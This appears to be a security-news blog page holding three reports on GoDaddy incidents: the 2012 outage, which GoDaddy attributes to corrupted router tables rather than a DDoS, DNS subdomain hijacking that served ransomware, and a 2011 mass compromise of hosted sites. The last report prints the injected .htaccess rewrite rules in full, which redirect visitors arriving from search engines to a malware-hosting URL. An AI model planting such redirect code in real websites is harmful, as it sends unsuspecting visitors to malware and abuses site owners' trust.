GoDaddy Outage Was Not Beacuse of Hacker Attack But Technical Difficulties

GoDaddy Outage Was Not Beacuse of Hacker Attack But Technical Difficulties 

GoDaddy -the website which is widely known as a DNS and hosting provider remained down for most of time on 10th September came back online in the 10th evening. As expected thousands of other web sites reportedly went offline as their hosting provider GoDaddy experienced massive service disruptions. GoDaddy, which claims to be the world's biggest web hosting company, confirmed the problems on its official Twitter account but has not yet stated the cause of the disruptions. A hacker code named "Anonymous Own3r" on Twitter took responsibility of the outage. The attack came on behalf of the hacker collective group 'Anonymous' as a protest against GoDaddy's support of the SOPA act. The hacker stated the reason of the outage is a massive denial of service (DDoS) attack which was generated from an IRC-Botnet. A tweet from the @AnonOpsLegion account: "#TangoDown -- http://www.godaddy.com/ | by@AnonymousOwn3r" was the initial public promotion of the outage, leading some to believe that the Anonymous online activist collective was behind the disruption. However, the AnonymousOwn3r account clarified in various tweets that: "it's not Anonymous coletive [sic] the attack is coming just from me." But this claim was later disputed by posts from the @YourAnonNews account which is known to be one of the legitimate twitter source of Anon. 

After completing the investigation of the outage, GoDaddy released a press note where they have clearly said that the outage was not because of DDoS attack but internal technical difficulties. According to Scott Wagner Go Daddy CEO -

"GoDaddy.com and many of our customers experienced intermittent service outages starting shortly after 10 a.m. PDT. Service was fully restored by 4 p.m. PDT. The service outage was not caused by external influences. It was not a "hack" and it was not a denial of service attack (DDoS). We have determined the service outage was due to a series of internal network events that corrupted router data tables. Once the issues were identified, we took corrective actions to restore services for our customers and GoDaddy.com. We have implemented measures to prevent this from occurring again.

At no time was any customer data at risk or were any of our systems compromised. Throughout our history, we have provided 99.999% uptime in our DNS infrastructure. This is the level our customers expect from us and the level we expect of ourselves. We have let our customers down and we know it. We take our business and our customers' businesses very seriously. We apologize to our customers for these events and thank them for their patience."

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">GoDaddy Outage Was Not Beacuse of Hacker Attack But Technical Difficulties"https://www.voiceofgreyhat.com/2012/09/GoDaddy-Outage-Was-Not-Beacuse-of-Hacker-Attack-But-Technical-Difficulties.html</a>

Ransomware Found on Hacked GoDaddy Sites, Infecting Thousand of Users

Ransomware Found on Hacked GoDaddy Sites, Infecting Thousand of Users 

Users who have their websites hosted by GoDaddy again fallen victim of cyber attack. Researcher at ShopsLabs reported that cyber criminals have managed to hack the DNS records of GoDaddy hosted websites and thus they infected a large number of GoDaddy users with ransomware. Fraser Howard, a Principal Virus Researcher of SophosLabs stated that the hackers behind these attacks are “exploiting DNS by hacking the DNS records of sites, adding one or more additional subdomains with corresponding DNS entries (A records) referencing malicious IP addresses. The legitimate hostname resolves to the legitimate IP address, but the added sub-domains resolve to rogue servers.” By doing so, the criminals are able to set-up URLs that seem legitimate, potentially sneaking through security filtering systems and duping Internet surfers into believing they are harmless, he explained in a Friday blog entry. In some instances, multiple subdomains were added to each user’s account, with each of them redirecting viewers to at least one malicious IP address.  

Go Daddy customers who wish to check they have not been affected by these attacks should check their DNS configuration according to the Go Daddy support page. 

As soon as the attack has been spotted in the wild, GoDaddy released a statement included below :-

"Go Daddy has detected a very small number of accounts have malicious DNS entries placed on their domain names. We have been identifying affected customers and reversing the malicious entries as we find them. Also, we're expiring the passwords of affected customers so the threat actors cannot continue to use the accounts to spread malware.
We suspect that the affected customers have been phished or their home machines have been affected by Cool Exploit as we have confirmed that this is not a vulnerability in the My Account or DNS management systems.
Go Daddy highly recommends that US- and Canada-based customers enable 2-Step Authentication to help protect their accounts. Details on how to set up this feature are located at http://support.godaddy.com/help/article/7502/enabling-twostep-authentication.
If a customer suspects their account may have an issue, we encourage them to contact Go Daddy Customer Care or fill out the form at the following link: https://support.godaddy.com/support/?section=support. "

While talking about GoDaddy and cyber attack, then we would like to remind you that, this may not have been the first hacking attempt against Go Daddy this fall. Couple of months ago, a hacker from Anonymous claimed to have taken down the domain registry and web hosting company. However, one day after the attack, Go Daddy denied they had been targeted by cyber criminals. Last year in September several GoDaddy sites were compromised, there also the reason was a malware. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Ransomware Found on Hacked GoDaddy Sites, Infecting Thousand of Users"https://www.voiceofgreyhat.com/2012/11/Ransomware-Found-on-Hacked-GoDaddy-Sites.html</a>

The Reason Behind The Massive Cyber-attack On godaddy.com Was A Malware

Hundreds of Go Daddy sites were compromised to point towards a site hosting malware last weekend. The mass hack of around 445 sites involved the injection of hostile code into the .htaccess files of the sites. 

Code:-

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L] 

Go Daddy quickly removed the hostile code before working with its customers to take back full control of the sites, which were reportedly compromised by a password hack.
Go Daddy’s chief information security officer, Todd Redfoot, told Domain Name Wire: "The accounts were accessed using the account holder’s username and password.”
It's unclear how the passwords needed to pull off the attack were obtained, but some sort of targeted phishing attack is one likely explanation. Go Daddy's investigation into the attack continues but Redfoot suggested the blame for the mass hack was outside Go Daddy's control.
"This was not an infrastructure breakdown and should not impact additional customers," he said.
Web security monitoring firm Securi warned of the mass hack on Thursday. Its blog post about the attack suggests the malicious code was targeted towards surfers visiting the affected domains via Google or other search engines rather than those who had arrived directly. Such trickery is often part and parcel of search engine manipulation attacks designed to redirect surfers hunting for content related to items in the news towards scareware portals. This kind of trickery often takes advantage of insecure WordPress installations and the like, so the apparent use of password-snaffling trickery in this case suggests the bad guys are becoming more aggressive in their hunt for sites they can abuse for their own malicious ends.

-News Source (Register)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">The Reason Behind The Massive Cyber-attack On godaddy.com Was A Malware"https://www.voiceofgreyhat.com/2011/09/reason-behind-massive-cyber-attack-on.html</a>